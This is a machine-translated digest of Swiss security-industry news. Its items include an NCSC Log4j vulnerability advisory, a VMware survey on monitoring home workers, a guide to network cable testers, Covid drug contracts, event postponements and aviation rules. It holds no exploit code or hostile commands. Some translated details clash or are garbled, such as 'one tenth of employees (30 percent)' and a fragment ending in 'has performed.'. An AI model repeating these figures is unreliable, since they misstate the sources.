The NCSC has been offering targeted content for private individuals, companies and IT specialists on its website for some time. Information for public authorities is now also explicitly offered.

In addition to current topics and concrete instructions for action, it addresses threats in cyberspace to which authorities may be exposed. According to the NCSC, care was taken to integrate existing knowledge when compiling the content.

For example, the "Guide for Municipalities" of the Network for Investigative Support in Digital Crime Prevention (NEDIK) forms an important basis. In addition, a selection of further information from other organizations dealing with cybersecurity topics can be found. The content is coordinated in cooperation with the Swiss Security Association (SVS) and is continuously supplemented.

In the context of the implementation of the NCS, this information offer for authorities is also an accompanying measure with regard to the implementation of measure 1 "Early recognition of trends and technologies and knowledge building". In this regard, the SVS is working on an "e-learning tool" that will be available to all municipal, cantonal and federal administrations in the course of 2022. This will be used to train employees on best practices in cyber and information security.

Information for authorities

Source: NCSC

According to a study by multi-cloud service provider VMware, the implementation of remote monitoring measures being pushed by many companies is jeopardizing the trust of employees working in home offices and increasing their fluctuation. According to the study, 60 percent of the German companies surveyed have either already introduced or are planning to introduce measures to monitor employee productivity since the switch to hybrid forms of working.

Secret spying

Monitoring email (41 percent), collaboration tools (41 percent) and web browsing (30 percent), as well as video surveillance (30 percent), webcams (25 percent) and keylogger software (25 percent) are often commonplace. However, 34 percent of companies that have already implemented device monitoring and 45 percent of those currently doing so are seeing increased or even dramatically increased employee turnover, according to the report.

Monitoring is often not communicated transparently, the study shows. One tenth of employees (30 percent) do not know whether their company has introduced systems to monitor productivity on their devices.

"A lack of transparency, surreptitious measurement and hidden control can quickly erode employee trust and lead to talented and motivated employees preferring to quit in a highly competitive and challenging skills market," Ralf Gegg, Head of Sales, End-User Computing Division at VMware, concludes, commenting on the study results.

(www.pressetext.com)

The four contracts on a Covid 19 drug solicitation are the result of an RFP the federal government issued in the summer of 2021 as part of its Covid 19 drug promotion program. has performed.

The total amount is around 27 million Swiss francs. The funding program will run until the end of 2022. It is intended to support the development of potentially important drugs to combat Covid-19. The contracts were signed with the following companies:

- GeNeuro SA, for the development of a monoclonal antibody to treat the long-term effects of Covid-19 (Long Covid) in patients suffering from severe neuropsychiatric symptoms;

- Kinarus AG, for the development of an oral combination therapy with antiviral and anti-inflammatory activity for all severities of Covid-19;

- Memo Therapeutics AG, for the development of an inhaled or intravenous monoclonal antibody for the treatment of infections with SARS-CoV-2, in patients at risk for a severe course of Covid-19;

- Noorik Biopharmaceuticals AG, for the development of an oral pulmonary vasodilator, to prevent respiratory failure and reduce the need for mechanical ventilation in the event of hospitalization due to Covid-19.

The new drugs are expected to be available by the end of 2022.

Due to the current Covid 19 situation, the conditions for an official permit to hold Swissbau in January 2022 are not met, he said, writes MCH Swiss Exhibition (Basel) Ltd. It has therefore been decided to postpone Switzerland's largest platform for the construction and real estate industry: The event will now be held in Basel from Tuesday, May 3 to Friday, May 6, 2022.

The exhibitors are behind the decision: In initial discussions with leading exhibitors from all sectors, despite the great disappointment, there was also clear support for a postponement to next spring, as the organizers emphasize.

Security Congress: new data

The Safety Congress, organized by Save AG, should have been held in parallel with Swissbau. It will also be postponed and will now take place on the Swissbau dates in May 2022. Due to the postponement, there may be slight changes to the program, according to Save AG.

For more info on the fair: www.swissbau.ch

For more info on the Safety Congress: www.save.ch

Last Friday, NCSC received reports of a critical vulnerability in the popular Java library "Log4j". The library is widely used in many commercial and open source software products.

The vulnerability (CVE-2021-44228 1) is criticalas it can be exploited remotely by an unauthenticated attacker to execute arbitrary malicious code. The criticality of the vulnerability is rated 10 (out of 10) in the Common Vulnerability Scoring System (CVSS), which indicates the severity of the vulnerability.

Apply security patches quickly

Since many third-party vendors use "Log4j" in their products, they are working hard to release patches for their products. In the past 48 hours, many vendors have published security patches for their products. NCSC urges organizations and national critical infrastructures to review their software landscape for use of "Log4j" and apply the appropriate patches as soon as possible. If patching is not possible, it is recommended that all possible remedial actions be taken to prevent further damage.

Private individuals also affected

But not only companies are at risk. The "Log4j" library is also present in many network and system components used in the private sector. It is therefore important for private individuals to keep their systems (computers, tablets, smartphones, WLAN routers, printers, etc.) up to date at all times and to ensure that they are updated regularly. In this way, the security patches that are continuously made available by the manufacturers can be installed as quickly as possible.

Warnings to potentially affected organizations

The NCSC is in constant contact with national and international partners on the issue, he said. On Saturday, the National Cyber Security Center began notifying potentially affected organizations in Switzerland about vulnerable "Log4j" instances accessible via the Internet. Such notifications were also sent to several national critical infrastructures.

Although the vulnerability could be used for targeted attacks on national critical infrastructures, the NCSC has not received any reports of this to date. The exploitation attempts observed so far have been used to spread mass malware such as "Mirai2," "Kinsing3," and "Tsunami3" (also known as Muhstik). These botnets are primarily used for DDoS attacks (Mirai, Tsunami) or for mining cryptocurrencies (Kinsing).

Recommendations and helpful information

For system administrators, NCSC has provided recommendations on how to proceed on GovCERT's blog, as well as the list of indicators of possible compromise (IOCs):

Blog GovCERT: Zero-Day Exploit Targeting Popular Java Library Log4j (available in English)

Source: NCSC

With regard to the testing of networks, it is important - in addition to the apparent analysis of the cabling - with the purpose of testing the cable category (Cat 5, 6, etc.) incl. structure (shielding, wire cross-section), also to select the appropriate measuring devices. The selection of devices from manufacturers such as Fluke Networks, Ideal Industries, netAlly, Netscout, etc. is sometimes unmanageable. Very simple network testers for copper cables start at 30 to 40 Swiss francs, professional models cost more than 1000 times as much as the simple devices. In order to separate the wheat from the chaff or to find the appropriate device for the respective purpose, the devices can be classified into different application categories: The very simple devices only check whether the connection between two cable terminations has electrical continuity and whether wire pairs are crossed or interchanged.

So-called Verification tester are of higher quality than continuity testers. They also test the basic cable continuity. In addition, there is the possibility of finding cable connections via so-called "toners", e.g. if the documentation has been carried out inadequately. Some of them offer the possibility to measure the cable length or the distance to a cable break or a short circuit by means of TDR (Time Domain Reflectometer). They therefore work on physical layer 1 (physical transmission layer) of the OSI model and thus verify the electrical signaling and the physical cabling components. The OSI model (Open Systems Interconnection Model) is a reference model for network protocols as a layered architecture. Another feature that can be helpful when PoE (PoE: Pover over Ethernet) devices malfunction is the ability of some testers to perform PoE switch verification. This determines the PoE class that can be supplied by the switch and thus also whether a switch can provide sufficient voltage for the PoE end device and via which pairs the voltage supply takes place.

Qualification tester offer, in addition to the possibilities of the verification testers, additional tests to check existing cabling for compliance with new requirements and also to be able to carry out more in-depth troubleshooting. They offer the additional benefit of qualifying the cabling bandwidth and identifying errors that impair it. They thus provide information as to whether a link incl. patch cable is qualified for 10/100Base-T or Gigabit. Nevertheless, just like verifiers, they work on layer 1 of the OSI model. The added value or surcharge compared to a verifier must therefore be examined carefully. In addition, the qualifier does not provide any proof of performance, as is the case with a certifier.

Certification tester guarantee compliance with industry standards and are required by many structured cabling manufacturers before they provide their warranties for new installations. Certification testers indicate whether a connection is compliant with a TIA (Telecommunication Industry Association) category or ISO (International Organization for Standardization) class, such as Category Cat 6 or Class E. In other words, they provide actual "pass" or "fail" information for compliance with relevant industry standards for structured cabling by injecting high-frequency signals into the line. Tests on copper and fiber optic cables can be performed equally here, working only at layer 1 of the OSI model. Software for exporting extensive data and reports provides options for digital documentation of the measurement results.

The Transmision tester offer, compared to the aforementioned devices, the possibility to perform network measurements also on layers 2 and 3 of the OSI model for copper as well as for fiber optic cabling in both LAN (Local Area Network) and WAN (Wide Area Network). With transmission testers, network and PoE load tests are thus possible, as well as ping tests, switch port identification and network configuration checks.

This technical report originally appeared in the printed edition SicherheitsForum 5-2021.

You want to read the articles of this issue? Then close right now here a subscription.

Windows Defender in Microsoft's operating system is part of the internal security system that monitors the Windows firewall as well as other relevant parts of the operating system and can be found under the system settings. The proprietary antivirus system, which is also found in Windows 10 and Windows 11, is installed and active by default. Once again, the program scored well with the independent German antivirus testers from AV-Test from Magdeburg received a top score in comparison with other antivirus solutions.

The comparison with 21 other current antivirus solutions is from the end of October. Windows Defender version 4.18 was able to prove itself under Windows 10 Home Edition with an overall score of all 18 points. The test criteria also included defense against cyberattacks, malware and malicious emails.

AV-Test awards six points per category. These include the factors performance, protection and usability. The evaluations also give consumers an indication of the current quality of protection and improvements to the protection programs. read.

Source: AV-Test

A "risk catalog" should contain key points that frequently give rise to issues that are relevant to damage and liability and can therefore also pose a threat to the company. Once the corresponding weak points have been identified, they must be discussed by the management so that appropriate risk scenarios can be developed and preventive or defensive measures can be initiated.

However, these tasks require people who not only have professional, human, communicative and integrative skills, but who can also identify grievances and master crises in a problem-solving manner. Safety officers have the often thankless task of passing the buck, so to speak; they must uncover weak points and take remedial action.

This often leads to conflicts with employees and superiors. Safety officers usually have to face unpleasant tasks in which they have to comply unambiguously with the requirements of occupational safety and health protection in the company and break resistance where action appears to be required in accordance with the law.

What must be observed?

Step 1: Company analysis and information:
Insofar as the company has historically had no significant incidents of damage, has a defined and communicated organizational structure and procedures, and has clear rules of conduct in the event of a crisis, only supplementary measures in the area of continuous training and information of employees and managers, as well as routine spot checks by regular bodies such as financial and production controlling or auditing, are appropriate.

Step 2: Delegation of responsibility:
Time and again, it happens that no one feels responsible in the event of a loss - blame and mistrust are the result. If a company is at increased risk due to its size, its decentralized management or due to a special situation, but there are no concrete indications of actual cases of damage, the possible worst-case scenario should nevertheless be prevented with a clear assignment of special responsibility as well as material and personnel resources. Management tools useful for this purpose, such as compliance programs, compliance officers, written codes of conduct, risk identification systems, written audit plans, etc., can already identify threatening risk situations at an early stage and can provide initial signals for rapid action.

Step 3: Monitoring / crackdown:
In most cases, when suspicions arise or even when damage occurs, the causes are not consistently investigated and appropriate action is taken in the event of proven violations. If the company finds itself in a situation of recurring problem situations with a high potential for danger, concrete suspicions and legal violations or damage that have already occurred, measures must be initiated immediately that are aimed at remedying the damage and holding those responsible accountable depending on the breach of duty. However, this often requires corresponding internal "powers of intervention" and a catalog of disciplinary measures in this regard, which must be adopted in advance within the company and communicated at all levels of the company. If, in addition, the offenses are relevant under labor law or even criminal law, the necessary steps must be taken under labor law, which should not stop at criminal charges in order to send clear signals.

But what to do if the safety officer is not heardWhat will he do if he is not supported in his actions by the management and left to his own devices? Embarrassing employees in the company who strive to comply with safety rules and safety standards, who deal with hazard identification and risk assessment on a daily basis, is frowned upon. Safety officers are entitled to the full attention of supervisors and management toward them. If they are not given this recognition, they are obligated and required to report violations and concerns unequivocally to management in writing. Thus, civil and criminal responsibility now rests with another level of management, whose representatives are now "condemned" to act because of their actual and legal ability to act.

But employees must also be aware of their operational responsibilities. They should know that their health and well-being are also on the line if they disregard occupational safety measures, fail to comply and thus expose colleagues to hazards. They, too, have a duty to cooperate in recognizing, containing and reporting risks; to this end, the relevant awareness must be trained and exemplary behavior must be recognized and rewarded. All of this requires courageous action, a convincing demeanor, and sometimes unwelcome measures for the good of the company and lawful and responsible action, especially from the company's management, but above all from the safety officers.

This technical report originally appeared in the printed edition SAFETY-PLUS 3-2021.

You want to read the articles of this issue? Then close right now here a subscription from.b

A new AI monitoring system by researchers of the Kaunas University of Technology (KTU)  from Lithuania analyzes sound emissions, as machine operators once did, in order to detect incipient damage at an early stage. Experts estimate that unforeseen machine failures cost the global industry around one trillion dollars every year.

Expensive machine downtime

"Since sound data is easy to collect due to the relatively low installation costs of microphones for existing plants, sound data-based methods are of great interest," explains KTU computer scientist Rytis Maskelinas. In very noisy factories, however, sound emissions from machines are superimposed by extraneous noise, which often leads to misinterpretations. In this way, damage is indicated that does not exist. The result is expensive machine downtime.

Maskelinas and his colleagues use a damage detection method based on real sound data from industrial machines in perfect working order. The algorithm developed by the researchers in Lithuania compares this data with the sound emissions of the machine on which faults are to be detected. In a training process, the software learns, so to speak, to concentrate only on the sounds of "its" machine and to block out other noise.

Deployment in poorer countries

Modern machines are equipped with a wide range of sensors that ensure reliable early detection of damage. But there are still countless plants, especially in less developed countries, that are not so well equipped. It is for these that Maskelinas has developed the system. He has drawn on an extensive data set of sounds from four pieces of technical equipment. The plan is to expand this data set to include other systems.

(pressetex.com)

Around 220 guests from business, science, the armed forces and administration met on November 4, 2021 in the multipurpose hall of the barracks in Bern for this year's industry orientation. Following the invitation of the Chief of Armament Martin Sonderegger, the Chief of the Armed Forces, Corps Commander Thomas Süssli, and the Head of Armasuisse Science and Technology, Thomas Rothacher, gave presentations.

Martin Sonderegger opened the industry orientation with the currently topical subject of "Security of the Future - Security for Switzerland". In his presentation, the Chief of Armaments addressed current procurements relevant to security policy. In doing so, he also addressed offset transactions and the associated importance of Switzerland's security-relevant technology and industrial base (STIB). Corps Commander Thomas Süssli commented on the topic.

"Why innovation is crucial for our security". In his remarks, he pointed out that innovation was central for Switzerland as a business location, but also for the future of the Swiss Armed Forces. The ability to innovate is the key to long-term success, he said.

The exponential development of technology with the fourth industrial revolution, scarce resources as well as the struggle for talent required constant questioning. The third speaker was Thomas Rothacher, who said that the rapid pace of technological change requires both civilian and military organizations to find new ways of finding solutions. These, Rothacher said, would only lead to success if all the circles involved were involved. Rothacher also presented new instruments and platforms in this context.

Source: Armasuisse

Working from home offers a variety of advantages: Long commutes are eliminated, as is the stress and time involved, resulting in a gain in free time. The start of the workday is much more relaxed. However, the general time management of the working day should also be mentioned here, as you can sometimes organize it much more individually in the home office.

In addition to the advantages that this form of work offers, it unfortunately also involves some risks - there are also disadvantages on a social level: Exchanges with colleagues, a little chat over coffee or any other spontaneous encounters are not possible in the home office.

Recommended office chairs for the seated area

Both active-dynamic sitting and height-adjustable desks are still on the rise and offer a welcome change for your back. But what is actually meant by this? With active-dynamic sitting, you change your sitting posture as often as possible. True to the motto: the next sitting posture is the better sitting posture. This is promoted by active office chairs, which, depending on the system, also unconsciously ensure a higher number of posture changes than is the case with conventional "immobile" office chairs. This is why they are particularly recommended for people who are dependent on additional movement impulses due to their almost exclusively sedentary activities.

Tip: Spend 30 percent of working time standing up

By the way: You should spend at least 30 percent of your working time standing. In addition to height-adjustable desks, mobile sit-stand desks offer an optimal and, above all, flexible solution for achieving this goal. Especially as a supplement to the classic desk. So you can quickly and independently of the desk do one or another activity while standing. In addition, you are not bound to a fixed place by mounted castors and can thus easily move your workplace to other premises. Mobile sit-stand desks thus develop an automated change of posture as if in the blink of an eye.

To do your back some additional good, you can incorporate various small exercise units into your daily office routine. Initially, simple stretching exercises are suitable. They relax the muscles and keep them flexible. But it's important to get out of your desk sometimes! Use your lunch break or after work for a walk or do other small exercises.

The Federal Council approved the adoption of new provisions of various EU decrees in favor of aviation at its meeting on November 24, 2021. These will now enter into force on February 1, 2022. As part of its participation in the Single European Sky, Switzerland is adopting a resolution that sets Europe-wide performance targets for the air traffic management network.

Based on this, Switzerland must submit national performance plans with binding specifications for the areas of safety, the environment, capacity and cost efficiency for Skyguide AG. This enables more direct flight routes and thus protects the environment, increases punctuality and reduces the cost of a flight.

Switzerland is also adopting a legal act that will enable the future introduction of a European risk classification system. The purpose of this system is to define and classify safety-relevant events in the same way throughout Europe, which will enable immediate measures to be determined. Other regulations that Switzerland is adopting relate to the design and installation of non-safety-relevant components in aircraft. This will significantly reduce the administrative work that has been necessary to date.

Christian Hegner, Director of the Federal Office of Civil Aviation (FOCA), signed the decision on behalf of Switzerland. The new provisions of the agreement will enter into force in Switzerland on February 1, 2022.

Source: Bazl